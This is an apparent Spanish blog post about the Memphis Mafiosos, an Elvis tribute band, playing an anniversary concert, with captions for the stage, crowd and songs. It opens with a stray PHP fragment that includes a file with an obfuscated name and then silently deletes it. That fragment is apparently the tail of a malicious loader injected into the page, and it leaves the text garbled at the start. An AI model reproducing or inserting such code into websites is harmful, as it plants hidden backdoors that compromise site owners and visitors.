");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?>
"En casa del herrero..." ya se sabe. Los Memphis Mafiosos aparecimos reinventando a Elvis el día que se cumplía el aniversario de su muerte, este año, más mafiosos que nunca y con la formación al completo. Presentandonos con el nuevo "uniforme" directamente desde el camerino, sin mediar palabra y apareciendo entre el humo (me recordaba a lluvia de estrellas, nos entraba la risa al pensar aquella frase que decía Bertín: esta noche, Jose Juán Mencía es... Elvis Presley!...) El ambiente caldeadito desde el principio (tocar en el Elvis es como tocar en casa) y además con 10.000 watios, que siempre es de agradecer! En la foto "Joche" en los primeros acordes de Blue Suede Shoes.
Para que me creais cuando digo que estaba a tope, esta foto muestra una buena perspectiva desde el escenario, (con el consabido espacio "obligatorio" entre el grupo y el público, para que se note que estábamos en tierras leonesas, claro!)
El escenario, de dos plantas, permitió a Sera (el "impasible") moverse al menos un poco más que la última vez. Claro que Jose se movía por todos...
Con Javier Arias llegó el delirio, tras la brevísima pausa del cambio de década, arranca el see see rider "con todo el poder".
Más fotos en la segunda parte de la noticia!